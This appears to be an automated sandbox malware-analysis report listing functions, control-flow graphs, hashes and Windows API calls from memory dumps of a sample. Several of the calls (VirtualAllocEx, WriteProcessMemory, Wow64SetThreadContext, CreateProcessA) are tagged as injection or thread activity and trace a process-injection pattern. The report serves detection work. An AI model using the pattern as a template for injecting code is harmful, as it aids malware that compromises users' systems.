                                                          • Not Executed
                                                          control_flow_graph 0 64e1dd0-64e1ee4 1 64e1f1e-64e1f96 0->1 2 64e1ee6-64e1f0d 0->2 3 64e1f98-64e1f9e 1->3 4 64e1fa1-64e1fa8 1->4 5 64e1f15-64e1f16 2->5 17 64e1f10 call 64e1f30 2->17 18 64e1f10 call 64e1dd0 2->18 3->4 6 64e1faa-64e1fb0 4->6 7 64e1fb3-64e2052 CreateWindowExW 4->7 6->7 9 64e205b-64e2093 7->9 10 64e2054-64e205a 7->10 14 64e2095-64e2098 9->14 15 64e20a0 9->15 10->9 14->15 16 64e20a1 15->16 16->16 17->5 18->5
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1301270727.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_64e0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d4f6a16b9762a806c337b620e1ec5b14a4ecf5523351f94fa56c9f182b7c9c5c
                                                          • Instruction ID: 0de55a6a096bb42d2764d169cfec608355b6a5d2aa3f11aa9a4e5fc2d081f67b
                                                          • Opcode Fuzzy Hash: d4f6a16b9762a806c337b620e1ec5b14a4ecf5523351f94fa56c9f182b7c9c5c
                                                          • Instruction Fuzzy Hash: D3915C71C09389AFCB16CFA5C850ACEBFB5EF4A300F15859BE444EB262C3749945CBA1
                                                          Function 07CF64E4 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 19 7cf64e4-7cf6585 22 7cf65be-7cf65de 19->22 23 7cf6587-7cf6591 19->23 30 7cf6617-7cf6646 22->30 31 7cf65e0-7cf65ea 22->31 23->22 24 7cf6593-7cf6595 23->24 25 7cf65b8-7cf65bb 24->25 26 7cf6597-7cf65a1 24->26 25->22 28 7cf65a5-7cf65b4 26->28 29 7cf65a3 26->29 28->28 32 7cf65b6 28->32 29->28 37 7cf667f-7cf6739 CreateProcessA 30->37 38 7cf6648-7cf6652 30->38 31->30 33 7cf65ec-7cf65ee 31->33 32->25 35 7cf6611-7cf6614 33->35 36 7cf65f0-7cf65fa 33->36 35->30 39 7cf65fe-7cf660d 36->39 40 7cf65fc 36->40 51 7cf673b-7cf6741 37->51 52 7cf6742-7cf67c8 37->52 38->37 41 7cf6654-7cf6656 38->41 39->39 42 7cf660f 39->42 40->39 43 7cf6679-7cf667c 41->43 44 7cf6658-7cf6662 41->44 42->35 43->37 46 7cf6666-7cf6675 44->46 47 7cf6664 44->47 46->46 48 7cf6677 46->48 47->46 48->43 51->52 62 7cf67ca-7cf67ce 52->62 63 7cf67d8-7cf67dc 52->63 62->63 64 7cf67d0 62->64 65 7cf67de-7cf67e2 63->65 66 7cf67ec-7cf67f0 63->66 64->63 65->66 67 7cf67e4 65->67 68 7cf67f2-7cf67f6 66->68 69 7cf6800-7cf6804 66->69 67->66 68->69 70 7cf67f8 68->70 71 7cf6816-7cf681d 69->71 72 7cf6806-7cf680c 69->72 70->69 73 7cf681f-7cf682e 71->73 74 7cf6834 71->74 72->71 73->74 76 7cf6835 74->76 76->76
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07CF6726
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: da8d456932d86b24f9da97528b061cdb21682715383296238bb8c37373b7649a
                                                          • Instruction ID: fb6259186f70b5915842968a4be0886969cc22035da1d65ff17663624def687e
                                                          • Opcode Fuzzy Hash: da8d456932d86b24f9da97528b061cdb21682715383296238bb8c37373b7649a
                                                          • Instruction Fuzzy Hash: 63A15BB1D0061ADFEB24CF68C881BEDBBB2BB44310F148569E948B7240DB749A85CF91
                                                          Function 07CF64F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 77 7cf64f0-7cf6585 79 7cf65be-7cf65de 77->79 80 7cf6587-7cf6591 77->80 87 7cf6617-7cf6646 79->87 88 7cf65e0-7cf65ea 79->88 80->79 81 7cf6593-7cf6595 80->81 82 7cf65b8-7cf65bb 81->82 83 7cf6597-7cf65a1 81->83 82->79 85 7cf65a5-7cf65b4 83->85 86 7cf65a3 83->86 85->85 89 7cf65b6 85->89 86->85 94 7cf667f-7cf6739 CreateProcessA 87->94 95 7cf6648-7cf6652 87->95 88->87 90 7cf65ec-7cf65ee 88->90 89->82 92 7cf6611-7cf6614 90->92 93 7cf65f0-7cf65fa 90->93 92->87 96 7cf65fe-7cf660d 93->96 97 7cf65fc 93->97 108 7cf673b-7cf6741 94->108 109 7cf6742-7cf67c8 94->109 95->94 98 7cf6654-7cf6656 95->98 96->96 99 7cf660f 96->99 97->96 100 7cf6679-7cf667c 98->100 101 7cf6658-7cf6662 98->101 99->92 100->94 103 7cf6666-7cf6675 101->103 104 7cf6664 101->104 103->103 105 7cf6677 103->105 104->103 105->100 108->109 119 7cf67ca-7cf67ce 109->119 120 7cf67d8-7cf67dc 109->120 119->120 121 7cf67d0 119->121 122 7cf67de-7cf67e2 120->122 123 7cf67ec-7cf67f0 120->123 121->120 122->123 124 7cf67e4 122->124 125 7cf67f2-7cf67f6 123->125 126 7cf6800-7cf6804 123->126 124->123 125->126 127 7cf67f8 125->127 128 7cf6816-7cf681d 126->128 129 7cf6806-7cf680c 126->129 127->126 130 7cf681f-7cf682e 128->130 131 7cf6834 128->131 129->128 130->131 133 7cf6835 131->133 133->133
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07CF6726
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: a6d91949094759d8764140f924db463affe5a5ee11084801db69362a12e15be8
                                                          • Instruction ID: ad0bdd70c5e7bb6674112dcc9dd88aca653e0ec79705e29fc51df8660d936f46
                                                          • Opcode Fuzzy Hash: a6d91949094759d8764140f924db463affe5a5ee11084801db69362a12e15be8
                                                          • Instruction Fuzzy Hash: 90915CB1D0071ADFEB24CF68C881B9DBBB2BB44310F148569E948B7240DB759A85CF91
                                                          Function 018FB43B Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 134 18fb43b-18fb457 135 18fb459-18fb466 call 18fa768 134->135 136 18fb483-18fb487 134->136 142 18fb47c 135->142 143 18fb468 135->143 138 18fb49b-18fb4dc 136->138 139 18fb489-18fb493 136->139 145 18fb4de-18fb4e6 138->145 146 18fb4e9-18fb4f7 138->146 139->138 142->136 189 18fb46e call 18fb6d0 143->189 190 18fb46e call 18fb6e0 143->190 145->146 147 18fb51b-18fb51d 146->147 148 18fb4f9-18fb4fe 146->148 153 18fb520-18fb527 147->153 150 18fb509 148->150 151 18fb500-18fb507 call 18fa774 148->151 149 18fb474-18fb476 149->142 152 18fb5b8-18fb678 149->152 155 18fb50b-18fb519 150->155 151->155 184 18fb67a-18fb67d 152->184 185 18fb680-18fb6ab GetModuleHandleW 152->185 156 18fb529-18fb531 153->156 157 18fb534-18fb53b 153->157 155->153 156->157 160 18fb53d-18fb545 157->160 161 18fb548-18fb551 call 18fa784 157->161 160->161 165 18fb55e-18fb563 161->165 166 18fb553-18fb55b 161->166 167 18fb565-18fb56c 165->167 168 18fb581-18fb58e 165->168 166->165 167->168 170 18fb56e-18fb57e call 18fa794 call 18fa7a4 167->170 175 18fb5b1-18fb5b7 168->175 176 18fb590-18fb5ae 168->176 170->168 176->175 184->185 186 18fb6ad-18fb6b3 185->186 187 18fb6b4-18fb6c8 185->187 186->187 189->149 190->149
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 018FB69E
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: a35c6424a866356f70878f24be23c915aca740be1a4fa9699a92c3bf2aff50f6
                                                          • Instruction ID: 0b5fbb4c9b0d528f31b473107e1ad2dcf62d33bcebaf62ab462032ca7539c55c
                                                          • Opcode Fuzzy Hash: a35c6424a866356f70878f24be23c915aca740be1a4fa9699a92c3bf2aff50f6
                                                          • Instruction Fuzzy Hash: 7A814670A00B058FEB24DF2AD04575ABBF1FF88314F10892DE58ADBA50D739E906CB91
                                                          Function 064E1F30 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 191 64e1f30-64e1f96 192 64e1f98-64e1f9e 191->192 193 64e1fa1-64e1fa8 191->193 192->193 194 64e1faa-64e1fb0 193->194 195 64e1fb3-64e2052 CreateWindowExW 193->195 194->195 197 64e205b-64e2093 195->197 198 64e2054-64e205a 195->198 202 64e2095-64e2098 197->202 203 64e20a0 197->203 198->197 202->203 204 64e20a1 203->204 204->204
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 064E2042
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1301270727.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_64e0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 91f53c1d499add03a6d2af07f23ee680a4e142ee82bcc0103433c2f0243e183a
                                                          • Instruction ID: 7ea5398393fb55140994a59d1f2b63db5f1468e92f37993249041e9432e02526
                                                          • Opcode Fuzzy Hash: 91f53c1d499add03a6d2af07f23ee680a4e142ee82bcc0103433c2f0243e183a
                                                          • Instruction Fuzzy Hash: 1041C2B1D003499FDB14CF9AC884ADEFBB6FF48310F64812AE918AB250D775A945CF90
                                                          Function 018F4BDC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 205 18f4bdc-18f60e1 CreateActCtxA 208 18f60ea-18f6144 205->208 209 18f60e3-18f60e9 205->209 216 18f6146-18f6149 208->216 217 18f6153-18f6157 208->217 209->208 216->217 218 18f6159-18f6165 217->218 219 18f6168 217->219 218->219 221 18f6169 219->221 221->221
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 018F60D1
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 6e5be4490c8cb2e478d9eb201fe3bd5a6fe57bfdd7928a0bcdf90f5de778316f
                                                          • Instruction ID: 4a5185d2d200710f18c17c6790b216ab7dfcff998641b01efa72fc08e19d6e44
                                                          • Opcode Fuzzy Hash: 6e5be4490c8cb2e478d9eb201fe3bd5a6fe57bfdd7928a0bcdf90f5de778316f
                                                          • Instruction Fuzzy Hash: 7741BF71C00719CBEB24DFAAC844B9DBBB5BF89304F20816AD508AB251EB756946CF90
                                                          Function 064E4670 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 238 64e4670-64e46ac 239 64e475c-64e477c 238->239 240 64e46b2-64e46b7 238->240 246 64e477f-64e478c 239->246 241 64e470a-64e4742 CallWindowProcW 240->241 242 64e46b9-64e46f0 240->242 243 64e474b-64e475a 241->243 244 64e4744-64e474a 241->244 249 64e46f9-64e4708 242->249 250 64e46f2-64e46f8 242->250 243->246 244->243 249->246 250->249
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 064E4731
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1301270727.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_64e0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 5fa844a3baa6aaad927a8f92f521fe1c4573cb8a8d478931755d20d85ae6a7c8
                                                          • Instruction ID: 99c9e5e4e73a28793458d3a5e3fca97f30137a5f7c67506299eb63d706326fde
                                                          • Opcode Fuzzy Hash: 5fa844a3baa6aaad927a8f92f521fe1c4573cb8a8d478931755d20d85ae6a7c8
                                                          • Instruction Fuzzy Hash: 854147B89003098FDB14DF99C488AAABBF5FF88315F24C459D519AB361C774A841CFA0
                                                          Function 018F6017 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 222 18f6017-18f60e1 CreateActCtxA 224 18f60ea-18f6144 222->224 225 18f60e3-18f60e9 222->225 232 18f6146-18f6149 224->232 233 18f6153-18f6157 224->233 225->224 232->233 234 18f6159-18f6165 233->234 235 18f6168 233->235 234->235 237 18f6169 235->237 237->237
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 018F60D1
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: a3af629e4a3606de244455704c4bf8cf2bf8c201de8c245ec3aea1df8dd85cf7
                                                          • Instruction ID: 373aea5fdec9e647ea1b2ee70703a47354c57e98dc866a26c49941a743ea0659
                                                          • Opcode Fuzzy Hash: a3af629e4a3606de244455704c4bf8cf2bf8c201de8c245ec3aea1df8dd85cf7
                                                          • Instruction Fuzzy Hash: 5241B0B5C00719CBEB24DFAAC844B9DFBF1BF48304F24816AD508AB251EB75694ACF50
                                                          Function 0650E5F8 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 272 650e5f8-650e5ff 275 650e600-650e665 FindCloseChangeNotification 272->275 276 650e667-650e66d 275->276 277 650e66e-650e696 275->277 276->277
                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0650E658
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1301819183.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_6500000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: 8eb3badd18236f372b0cf917b4d58a280d2f8f43d808700632199b115a8fb0a2
                                                          • Instruction ID: db73a4e8ffb51820fcd2b4e00113c7c5522d4f7b06d98ebbc8372fefde1b9f04
                                                          • Opcode Fuzzy Hash: 8eb3badd18236f372b0cf917b4d58a280d2f8f43d808700632199b115a8fb0a2
                                                          • Instruction Fuzzy Hash: 43319CB5D003498FDB50DF99D845AEEBBF4FF48310F148819E524A7291D7349901CFA1
                                                          Function 018FDDD3 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 252 18fddd3-18fddd8 253 18fddda-18fddeb 252->253 254 18fddb9-18fddbe 252->254 257 18fddf6-18fdefe 253->257 255 18fdd8c-18fdda4 DuplicateHandle 254->255 256 18fddc0-18fddca 254->256 258 18fddad-18fddca 255->258 259 18fdda6-18fddac 255->259 259->258
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 904a9e8179f1239a3f732dc5e340a257d076ab7bc4adbd463de8bfbfad467d85
                                                          • Instruction ID: d9c7dd53c9d1a44e5d1f09bfac5283f7cc82562a61b32de3a278aa9982a0a287
                                                          • Opcode Fuzzy Hash: 904a9e8179f1239a3f732dc5e340a257d076ab7bc4adbd463de8bfbfad467d85
                                                          • Instruction Fuzzy Hash: E0313DB8A81352CFF724EFA1F4597693BA9FB88710F10842AEA058B3D5DB785901CF54
                                                          Function 07CF6261 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 280 7cf6261-7cf62b6 283 7cf62b8-7cf62c4 280->283 284 7cf62c6-7cf6305 WriteProcessMemory 280->284 283->284 286 7cf630e-7cf633e 284->286 287 7cf6307-7cf630d 284->287 287->286
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07CF62F8
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 625e741be4eb657100d0d5df1ddb38de27eed133ff3253b9eb439e02b2cf11d4
                                                          • Instruction ID: 149c7b86cceba6160d0b3d10a8124024f70f5676aa3dcf043eb972e0b272f07b
                                                          • Opcode Fuzzy Hash: 625e741be4eb657100d0d5df1ddb38de27eed133ff3253b9eb439e02b2cf11d4
                                                          • Instruction Fuzzy Hash: 23216BB5D003499FDB10CFAAC881BDEBBF5FF48314F108429E918A7240C7789945CBA1
                                                          Function 07CF6268 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 291 7cf6268-7cf62b6 293 7cf62b8-7cf62c4 291->293 294 7cf62c6-7cf6305 WriteProcessMemory 291->294 293->294 296 7cf630e-7cf633e 294->296 297 7cf6307-7cf630d 294->297 297->296
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07CF62F8
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: c774c4a42881393a7b4d5d2f0bd882f835189155e3f73c812c3cfcc209daf315
                                                          • Instruction ID: 2a27991a4328005f641fe2d383b7751c759163efd6516555cc4cc56973188046
                                                          • Opcode Fuzzy Hash: c774c4a42881393a7b4d5d2f0bd882f835189155e3f73c812c3cfcc209daf315
                                                          • Instruction Fuzzy Hash: 642169B1D003499FDB10CFAAC881BDEBBF5FF48310F108429E918A7240C7789945CBA0
                                                          Function 07CF5C90 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 301 7cf5c90-7cf5ce3 304 7cf5ce5-7cf5cf1 301->304 305 7cf5cf3-7cf5d23 Wow64SetThreadContext 301->305 304->305 307 7cf5d2c-7cf5d5c 305->307 308 7cf5d25-7cf5d2b 305->308 308->307
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07CF5D16
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 1cde6ed3d3bf8c28201ced418fc7986db8cce94bb569cfed43864927866f9b16
                                                          • Instruction ID: ea4bdfb70566d4713f4d2b510d465000ae683ccaeb57f6dda3ef806466379e4a
                                                          • Opcode Fuzzy Hash: 1cde6ed3d3bf8c28201ced418fc7986db8cce94bb569cfed43864927866f9b16
                                                          • Instruction Fuzzy Hash: C82136B1D003099FDB10DFAAC485BEEBBF5AF48220F14842AD519A7280CB789945CBA0
                                                          Function 07CF6351 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 312 7cf6351-7cf63e5 ReadProcessMemory 316 7cf63ee-7cf641e 312->316 317 7cf63e7-7cf63ed 312->317 317->316
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07CF63D8
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 36d9a9563c117dcd87672d721c7d8d88cb51587a017307e20cf5f1c15dcc2556
                                                          • Instruction ID: 24ce1a32c6496936b1e94773d0ab2268d9a84e2af3a20b0134096c0644339e4f
                                                          • Opcode Fuzzy Hash: 36d9a9563c117dcd87672d721c7d8d88cb51587a017307e20cf5f1c15dcc2556
                                                          • Instruction Fuzzy Hash: 552107B5C003599FDB10DFAAC881BEEBBF5FF48310F508429E918A7250C7759545CBA5
                                                          Function 018FD734 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 321 18fd734-18fdda4 DuplicateHandle 324 18fddad-18fddca 321->324 325 18fdda6-18fddac 321->325 325->324
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018FDCD6,?,?,?,?,?), ref: 018FDD97
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: c27ef5bcb42acc7a95db2f2c492482603a858fd14f60c628897ab97306008b10
                                                          • Instruction ID: 9663c1893f87e58178918ffab0515c4db0d217ede02cfa0d370f95e626cd3ce2
                                                          • Opcode Fuzzy Hash: c27ef5bcb42acc7a95db2f2c492482603a858fd14f60c628897ab97306008b10
                                                          • Instruction Fuzzy Hash: 5D2103B5D00349AFDB10DF9AD884AEEBBF4EB48310F14841AEA18A3350D375A944CFA0
                                                          Function 07CF5C98 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07CF5D16
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 674266a7102935394e124d1c112bdba9d471fe09492825e3f874df80a16177c9
                                                          • Instruction ID: 86e942fcfec39f64f23830c3257126c85fad2d0915c3f4deab8be67d7c70435e
                                                          • Opcode Fuzzy Hash: 674266a7102935394e124d1c112bdba9d471fe09492825e3f874df80a16177c9
                                                          • Instruction Fuzzy Hash: 8F2149B1D003099FDB10DFAAC4857EEBBF5EF48320F54842AD559A7240CB789945CFA0
                                                          Function 07CF6358 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07CF63D8
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: f9de31ffc4e0bb9e99439bf32d5317816838af0311b1d6cbe5889b446f2fd2b5
                                                          • Instruction ID: 6bae6e99f6e05d5e9650e0664f6bbf5a860d0f51da22559a3f488b648d36d208
                                                          • Opcode Fuzzy Hash: f9de31ffc4e0bb9e99439bf32d5317816838af0311b1d6cbe5889b446f2fd2b5
                                                          • Instruction Fuzzy Hash: D52116B1C003599FDB10DFAAC881BEEBBF5FF48310F508429E918A7240C7799945CBA0
                                                          Function 018FDD08 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018FDCD6,?,?,?,?,?), ref: 018FDD97
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 3e79f61c2ccb91c5d6dbbc6032607f39e164d1e39b9b141b1ad77ebf9d129bce
                                                          • Instruction ID: 4cec637a02c35dded69ff451a399b5b847c234d7f2a277be2fb53b97c09c209e
                                                          • Opcode Fuzzy Hash: 3e79f61c2ccb91c5d6dbbc6032607f39e164d1e39b9b141b1ad77ebf9d129bce
                                                          • Instruction Fuzzy Hash: 4E21F2B5D002099FDB10CF9AD585ADEBBF4EB08310F14841AE914A3250D374AA40CF60
                                                          Function 07CF61A1 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07CF6216
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 4a027324b7efad2779c73c6dc00da8e80343769e625da87ff30640009d6a8189
                                                          • Instruction ID: ae12c6d7e665664dd477635e3e97b33ee1e5f65a71ff80e7cb26af9fabaa894f
                                                          • Opcode Fuzzy Hash: 4a027324b7efad2779c73c6dc00da8e80343769e625da87ff30640009d6a8189
                                                          • Instruction Fuzzy Hash: BE1133759003499BDB20DFAAC845BEEBBF5EB48320F208819E915A7250CB75A940CBA1
